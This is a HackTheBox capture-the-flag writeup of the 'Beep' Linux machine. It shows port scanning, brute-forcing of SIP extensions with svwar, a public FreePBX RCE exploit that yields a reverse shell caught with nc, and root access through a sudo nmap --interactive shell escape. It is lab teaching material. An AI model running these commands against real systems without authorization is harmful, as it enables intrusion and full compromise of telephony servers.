Beep
Walkthrough of the Beep machine – Elastix/FreePBX enumeration, SIP extension bruteforcing with svwar, remote code execution via a public exploit, and sudo NOPASSWD nmap privilege escalation.
# Beep - HackTheBox Writeup
Beep is an Easy Linux machine on HackTheBox. It focuses on enumerating an Elastix/FreePBX VoIP server, brute-forcing valid SIP extensions, exploiting a known FreePBX remote code execution vulnerability, and escalating privileges through a sudo NOPASSWD misconfiguration on nmap.
Difficulty: Easy
Operating System: Linux
Themes: SIP Enumeration, FreePBX/Elastix RCE, Sudo Misconfig
## Reconnaissance
### Initial Port Scanning
Port Scan:
1
nmap -sT -p- --min-rate 1000 10.129.229.183
Findings:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
143/tcp open imap
443/tcp open https
857/tcp open unknown
993/tcp open imaps
995/tcp open pop3s
3306/tcp open mysql
4190/tcp open sieve
4445/tcp open upnotifyp
4559/tcp open hylafax
5038/tcp open unknown
10000/tcp open snet-sensor-mgmt
A wide spread of services: SSH, SMTP, HTTP/HTTPS, POP3, RPC, IMAP, MySQL, and more — worth digging deeper on the key ones.
### Deep Port Scanning
1
nmap -sCV -p 22,25,80,110,111,143,443,993,995,3306 10.129.229.183
Findings:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
25/tcp open smtp?
80/tcp open http Apache httpd 2.2.3
|_http-title: Did not follow redirect to https://10.129.229.183/
|_http-server-header: Apache/2.2.3 (CentOS)
110/tcp open pop3?
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap?
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
|_http-title: Elastix - Login page
993/tcp open imaps?
995/tcp open pop3s?
3306/tcp open mysql?
Old OpenSSH (4.3) and Apache 2.2.3 on CentOS, with port 443 pointing to an Elastix login page.
## Web Enumeration
The web app on port 443 is an Elastix login page. I tried a handful of common credentials without success, so I moved to enumerating the app structure with dirsearch:
1
dirsearch -u http://10.129.229.183 -w /usr/share/SecLists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -e txt,php -t 50
This surfaced an /admin directory worth investigating further.
## Initial Access
Browsing to /admin revealed the FreePBX version running underneath Elastix. 
FreePBX is a free, web-based GUI used to control and manage Asterisk,which an open-source telephony and VoIP server engine.
With the version in hand, I checked Exploit-DB via searchsploit:
1
searchsploit freepbx
This returned a remote code execution exploit matching the running version. I copied the script locally and set the target IP, my IP, and listening port. The exploit also required a valid SIP extension number to work.
### Finding a Valid Extension
Elastix/FreePBX runs on SIP (Session Initiation Protocol), used to start, manage, and end real-time communication sessions. Each extension on the PBX represents a user or endpoint, and probing it with a SIP request can reveal whether it’s valid:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
SIP PBX
│
├── Extension 100
├── Extension 101
└── Extension 102
│
▼
SIP Request
│
▼
SIP Response
│
▼
Extension Status
I used svwar to brute-force extensions in the 100–999 range via the INVITE method:
1
svwar -m INVITE -e100-999 10.129.229.183
Result (relevant entry):
1
2
3
4
5
+-----------+----------------+
| Extension | Authentication |
+===========+================+
| 233 | reqauth |
+-----------+----------------+
Extension 233 responded with reqauth, marking it as a valid, registered extension — the rest returned weird and weren’t usable.
### Getting a Shell
With a valid extension, I set the exploit script’s rhost, lhost, lport, and extension values, started a listener, and ran the script:
1
nc -nlvp 443
1
python2 exploit.py
1
2
3
4
listening on [any] 443 ...
connect to [10.10.17.196] from (UNKNOWN) [10.129.229.183] 52175
whoami
asterisk
Shell obtained as asterisk.
## Privilege Escalation
Enumerating sudo permissions for the current user:
1
sudo -l
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
User asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service
(root) NOPASSWD: /sbin/init
(root) NOPASSWD: /usr/sbin/postmap
(root) NOPASSWD: /usr/sbin/postfix
(root) NOPASSWD: /usr/sbin/saslpasswd2
(root) NOPASSWD: /usr/sbin/hardware_detector
(root) NOPASSWD: /sbin/chkconfig
(root) NOPASSWD: /usr/sbin/elastix-helper
nmap can be run as root with no password. This version of nmap ships an interactive mode that can break out to a shell — a well-known GTFOBins technique:
1
sudo nmap --interactive
1
2
3
4
5
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !/bin/bash
whoami
root
Root shell obtained. Solved – happy hacking!
This machine has multiple valid paths to root; I chose this route specifically to learn more about SIP and VoIP exploitation.
Find me online:
• TryHackMe: t4t4r1s
• HackTheBox: t4t4r1s
• LinkedIn: Mustafa Eltayeb
• X: @mustafa_altayeb



